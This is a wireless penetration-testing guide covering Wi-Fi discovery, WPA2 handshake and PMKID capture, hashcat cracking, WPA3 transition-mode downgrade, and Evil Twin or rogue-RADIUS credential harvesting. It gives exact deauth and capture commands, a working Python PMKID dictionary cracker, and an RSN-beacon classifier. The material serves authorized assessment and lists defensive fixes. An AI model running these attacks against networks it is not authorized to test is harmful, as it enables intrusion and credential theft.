
Wireless penetration testing measures how easily an attacker sitting in your parking lot, or your lobby, can get onto your network or harvest credentials over the air. Wi-Fi extends your attack surface past the walls, and a single weak pre-shared key or an unvalidated 802.1X certificate can undo every firewall you own. The good news: the methodology is well-defined and the tooling is mature.
This guide covers the wireless pentest workflow end to end: discovery, handshake capture, cracking, WPA3 considerations, and Evil Twin attacks. We name the exact commands so the work is reproducible. It sits alongside our broader network penetration testing overview and the internal network penetration testing guide that picks up once you're on the LAN.
Wireless penetration testing is an authorized assessment of Wi-Fi networks and the clients that use them, aimed at finding weaknesses an attacker could exploit from radio range. That includes the encryption protecting each SSID, the strength of pre-shared keys, the configuration of enterprise 802.1X, and whether users can be lured onto rogue access points.
Unlike a wired test, the scope is defined by radio range. A tester maps which of your networks are reachable from public areas, identifies guest and corporate SSID separation, and checks whether a foothold on Wi-Fi grants access to the internal network or stays sandboxed. The deliverable is usually a mix of crackable keys, missing client protections, and segmentation gaps.
The one piece of special hardware is a wireless adapter that supports monitor mode and packet injection, such as chipsets based on the Atheros AR9271 (2.4 GHz only) or the Realtek RTL8812AU (dual-band). Make sure the adapter covers 5 GHz: one that only sees 2.4 GHz silently misses corporate SSIDs that are 5 GHz-only. Everything else is software, and Kali or a similar distro ships most of it.
Stop the processes that will fight for the interface (airmon-ng check kill), put the adapter in monitor mode with airmon-ng start wlan0, then survey with airodump-ng --band abg wlan0mon to hop across 2.4 and 5 GHz and list every BSSID, channel, encryption type, and connected client in range.
WPA2-PSK falls to one of two captures followed by offline cracking. The classic route grabs the 4-way handshake: lock onto the target with airodump-ng -c 6 --bssid <AP> -w cap wlan0mon (the capture lands in cap-01.cap), force a reconnect with a deauth (aireplay-ng -0 5 -a <AP> -c <client> wlan0mon), and catch the handshake when the client re-associates; airodump-ng shows "WPA handshake: <AP>" in its header once it has one. If the network enforces Protected Management Frames (802.11w), clients ignore unauthenticated deauth frames and you have to wait for a natural reconnect.
The cleaner, clientless route is the PMKID attack: hcxdumptool -i wlan0mon -w capture.pcapng (older releases spell the output flag -o) associates with the AP itself and pulls the PMKID out of the first EAPOL message the AP sends back, so no deauth and no connected client are needed. Not every AP includes a PMKID; if none turns up, fall back to the handshake. Either way, convert with hcxpcapngtool -o capture.hc22000 capture.pcapng (it also accepts the .cap that airodump-ng writes) and crack with hashcat -m 22000 capture.hc22000 wordlist.txt. The whole test really measures one thing: is the pre-shared key in a wordlist, or reachable from one by a rule set or mask? A 12-character random key drawn from the full printable set is out of reach for brute force; "Summer2025!" cracks in minutes.
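What hashcat -m 22000 actually does with a PMKID line is small enough to show in full. The added example below (not from the original page or from the hashcat/hcx projects) derives the WPA2 PMK from a candidate passphrase and SSID, computes the PMKID the AP would have put in its first handshake message, and compares it with the one in a hc22000 line. The SSID "CorpWiFi", the two MAC addresses and the wordlist are constructed fixtures; the hc22000 line is built by the script itself rather than taken from a real capture.

```python
import hashlib
import hmac
from typing import Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits), per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC) for the WPA2-PSK AKM."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_hc22000_pmkid(line: str) -> dict:
    """Parse a hashcat 22000 PMKID line: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_HEX***"""
    f = line.strip().split("*")
    if len(f) < 6 or f[0] != "WPA" or f[1] != "01":
        raise ValueError("not a hashcat 22000 PMKID line")
    return {
        "pmkid": bytes.fromhex(f[2]),
        "ap": bytes.fromhex(f[3]),
        "sta": bytes.fromhex(f[4]),
        "ssid": bytes.fromhex(f[5]).decode(),
    }


def crack_pmkid(line: str, wordlist) -> Optional[str]:
    """Return the first wordlist entry whose derived PMKID matches the captured one, else None."""
    target = parse_hc22000_pmkid(line)
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, target["ssid"])
        if pmkid_from_pmk(pmk, target["ap"], target["sta"]) == target["pmkid"]:
            return candidate
    return None


def make_hc22000_pmkid(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Build the line hcxpcapngtool would emit for such a capture (used here only to construct fixtures)."""
    pmkid = pmkid_from_pmk(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac)
    return f"WPA*01*{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


# Constructed fixtures: hypothetical SSID and MACs, one weak and one random passphrase.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
WEAK_LINE = make_hc22000_pmkid("Summer2025!", "CorpWiFi", AP_MAC, STA_MAC)
STRONG_LINE = make_hc22000_pmkid("x7Q!p2mZ#v9L", "CorpWiFi", AP_MAC, STA_MAC)
WORDLIST = ["password", "Welcome1", "Summer2024!", "Summer2025!", "CorpWiFi123"]

if __name__ == "__main__":
    print(crack_pmkid(WEAK_LINE, WORDLIST))    # Summer2025!
    print(crack_pmkid(STRONG_LINE, WORDLIST))  # None
```

The 4096-round PBKDF2 is the whole cost of the attack: a GPU doing hashcat's job runs the same loop millions of times per second, so the only variable that matters is whether the passphrase is in the candidate set. The standard test vector from 802.11i (passphrase "password", SSID "IEEE") is a quick way to confirm the derivation is right before trusting any result.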
WPA3 closes the offline-cracking hole that defines WPA2, but it isn't bulletproof. Its Simultaneous Authentication of Equals (SAE) handshake resists the capture-and-crack workflow, so a strong WPA3 network won't fall to aircrack-ng the way WPA2 does. That's a genuine improvement.
The catch is transition mode. Most deployments run WPA3 in a mixed WPA2/WPA3 mode for backward compatibility, and the same passphrase serves both. An attacker who stands up a rogue AP with the target SSID that advertises WPA2 only gets transition-mode clients to connect with WPA2-PSK, which yields a handshake to crack offline, and the recovered key opens the WPA3 side as well. The Dragonblood research (Vanhoef and Ronen, 2019) also showed side-channel and downgrade weaknesses in early SAE implementations, including a security-group downgrade. So a WPA3 test checks for transition-mode downgrade, weak-group negotiation, and whether the network can be coerced back to a crackable handshake. WPA3-only, with Protected Management Frames required and a strong passphrase, is the configuration you want to confirm.
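Whether an SSID is WPA3-only, transition mode or plain WPA2 is written into the RSN information element of every beacon, so the downgrade check can be automated from a capture. The added example below (not from the original page) decodes the RSN IE (tag 0x30: version, group cipher, pairwise cipher list, AKM list, RSN capabilities) and classifies the AP from the AKM suites and the MFP bits; a PSK and SAE AKM advertised together is transition mode. The three beacons it checks are constructed with the helper at the bottom rather than taken from real traffic. To run it over a capture you would feed it the raw IE bytes from each beacon's tagged parameters.

```python
import struct

OUI = b"\x00\x0f\xac"  # IEEE 802.11 suite selectors
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 8: "GCMP-128", 9: "GCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 18: "OWE"}
MFPR, MFPC = 0x40, 0x80  # RSN Capabilities bits 6 and 7


def _suite(raw: bytes, table: dict) -> str:
    if raw[:3] != OUI:
        return "vendor:" + raw.hex()
    return table.get(raw[3], f"unknown-{raw[3]}")


def parse_rsn_ie(ie: bytes) -> dict:
    """Decode an RSN information element (tag 0x30) from a beacon or probe response."""
    if len(ie) < 2 or ie[0] != 0x30:
        raise ValueError("not an RSN IE")
    body = ie[2:2 + ie[1]]
    off = 0
    version = struct.unpack_from("<H", body, off)[0]; off += 2
    group = _suite(body[off:off + 4], CIPHERS); off += 4
    n = struct.unpack_from("<H", body, off)[0]; off += 2
    pairwise = [_suite(body[off + 4 * i:off + 4 * i + 4], CIPHERS) for i in range(n)]; off += 4 * n
    n = struct.unpack_from("<H", body, off)[0]; off += 2
    akm = [_suite(body[off + 4 * i:off + 4 * i + 4], AKMS) for i in range(n)]; off += 4 * n
    # RSN Capabilities is optional at the end of the element; absent means no PMF bits set.
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm,
            "mfp_capable": bool(caps & MFPC), "mfp_required": bool(caps & MFPR)}


def classify_ap(ie: bytes) -> str:
    """Map an RSN IE to the finding a wireless tester would record."""
    r = parse_rsn_ie(ie)
    akm = set(r["akm"])
    if "SAE" in akm and not akm & {"PSK", "PSK-SHA256"}:
        if r["mfp_required"]:
            return "WPA3-only: no offline-crackable handshake"
        return "WPA3-only but PMF not required: misconfigured, check deauth resistance"
    if "SAE" in akm:
        return "WPA3 transition mode: rogue WPA2-only AP can downgrade clients"
    if akm & {"PSK", "PSK-SHA256"}:
        return "WPA2-PSK: handshake/PMKID offline-crackable"
    if akm & {"802.1X", "802.1X-SHA256"}:
        return "Enterprise 802.1X: test RADIUS certificate validation"
    return "other: " + ",".join(sorted(akm))


def build_rsn_ie(pairwise, akm, caps: int) -> bytes:
    """Assemble a constructed RSN IE with CCMP group cipher (fixture helper, not a capture)."""
    body = struct.pack("<H", 1) + OUI + bytes([4])
    body += struct.pack("<H", len(pairwise)) + b"".join(OUI + bytes([c]) for c in pairwise)
    body += struct.pack("<H", len(akm)) + b"".join(OUI + bytes([a]) for a in akm)
    body += struct.pack("<H", caps)
    return bytes([0x30, len(body)]) + body


# Constructed beacons: a transition-mode AP, a WPA3-only AP, and a plain WPA2-PSK AP.
TRANSITION_IE = build_rsn_ie([4], [2, 8], MFPC)          # PSK + SAE, PMF capable only
WPA3_ONLY_IE = build_rsn_ie([4], [8], MFPC | MFPR)       # SAE only, PMF required
WPA2_IE = build_rsn_ie([4], [2], 0)                      # PSK only, no PMF

if __name__ == "__main__":
    for name, ie in [("transition", TRANSITION_IE), ("wpa3", WPA3_ONLY_IE), ("wpa2", WPA2_IE)]:
        print(name, "->", classify_ap(ie))
```

Transition mode is required by the Wi-Fi Alliance to advertise MFP as capable but not required, which is exactly what lets a WPA2-only client (or a rogue AP pretending to serve one) fall back; a correctly deployed WPA3-only SSID shows SAE alone with MFPR set.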
Evil Twin attacks sidestep the encryption entirely by impersonating a trusted network. You stand up a fake AP with the same SSID using eaphammer or hostapd, deauth clients off the real one, and capture credentials or serve a captive-portal phish when they reconnect to yours. Against open or guest networks this is trivial. Against PSK you can't complete the association without the key, but a client that tries still sends the second handshake message, and that half-handshake (M1 from your AP, M2 from the client) is enough for hashcat -m 22000, so the evil twin doubles as a handshake collector; for credential phishing it's harder but still works.
WPA2-Enterprise (802.1X) is where it gets interesting. If client supplicants don't strictly validate the RADIUS server certificate, a rogue AP backed by a rogue RADIUS server (hostapd-wpe, eaphammer) terminates the PEAP or EAP-TTLS tunnel itself and harvests the inner MSCHAPv2 challenge-response. hostapd-wpe prints it in asleap and hashcat NETNTLM (-m 5500) formats; a weak password falls to a wordlist, and because the response is DES over the NT hash, the hash itself can be recovered by full-keyspace search on dedicated hardware regardless of password strength. Those are usually the user's Active Directory credentials. The fix lives on the client: validate the server certificate against a pinned CA and server name, don't let users click through an unknown certificate, and ideally move to EAP-TLS with client certificates. Because wireless exposure shifts as APs and clients change, the continuous approach in agentic pentesting complements periodic on-site Wi-Fi assessments.